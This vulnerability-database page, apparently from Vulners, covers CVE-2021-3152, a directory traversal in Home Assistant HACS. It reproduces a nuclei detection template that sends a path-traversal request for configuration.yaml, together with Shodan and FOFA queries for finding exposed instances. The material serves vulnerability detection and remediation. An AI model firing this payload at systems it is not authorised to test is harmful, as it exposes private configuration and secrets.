Lucene search
K

Home Assistant HACS - Local File Inclusion

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Home Assistant HACS before 2021.1.3 allows directory traversal in custom integrations, enabling file access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ArchLinux
[ASA-202101-44] home-assistant: information disclosure
29 Jan 202100:00
archlinux
Circl
CVE-2021-3152
22 Apr 202608:43
circl
CNNVD
Home Assistant 路径遍历漏洞
26 Jan 202100:00
cnnvd
CNVD
Home Assistant Directory Traversal Vulnerability
29 Jan 202100:00
cnvd
CVE
CVE-2021-3152
21 Jan 202115:10
cve
Cvelist
CVE-2021-3152
21 Jan 202115:10
cvelist
NVD
CVE-2021-3152
26 Jan 202118:16
nvd
OpenVAS
Home Assistant < 2021.1.3 Path Traversal Vulnerability
15 Jun 202300:00
openvas
Prion
Directory traversal
26 Jan 202118:16
prion
Positive Technologies
PT-2021-19401
21 Jan 202100:00
ptsecurity
Rows per page
id: CVE-2021-3152

info:
  name: Home Assistant HACS - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Home Assistant before 2021.1.3 lacks a protection layer against directory-traversal attacks in custom integrations, letting attackers access arbitrary files, exploit requires attacker to deploy malicious custom integration.
  impact: |
    Attackers can access sensitive files on the system, potentially leading to information disclosure or further system compromise.
  remediation: Update to version 2021.1.3 or later to include protection against directory traversal in custom integrations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3152
    - https://lyghtnox.gitlab.io/posts/hacs-exploit/
    - https://www.home-assistant.io/blog/2021/01/22/security-disclosure/
    - https://github.com/hacs/integration/commit/f2b7cb711e41a94b81610f6ff96ea314e9879114
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3152
    epss-score: 0.02231
    epss-percentile: 0.80544
    cwe-id: CWE-22
  metadata:
    verified: false
    max-request: 1
    vendor: hacs
    product: integration
    shodan-query: title:"Home Assistant"
    fofa-query: title="Home Assistant"
  tags: cve,cve2021,hacs,homeassistant,lfi

http:
  - raw:
      - |
        GET /hacsfiles/../../configuration.yaml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "default_config:"
          - "homeassistant:"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a00463044022000be5fb761e5627e8a25fe00c7243c918df1ac78733841e9b5afd9ed93ed8cd002206ce45db997c381d2691f5e3e41f29dcea6cc72e7202554eeb0e4b10b66ff3f4b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 08:43Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.02231
28